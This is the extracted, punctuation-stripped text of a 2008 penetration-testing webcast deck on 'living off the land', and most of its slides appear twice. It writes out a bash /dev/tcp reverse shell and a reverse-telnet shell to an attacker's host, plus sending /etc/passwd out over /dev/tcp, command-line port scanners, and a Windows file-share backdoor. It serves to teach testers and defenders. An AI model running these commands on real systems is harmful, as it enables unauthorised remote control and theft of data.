bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 11
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 12
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
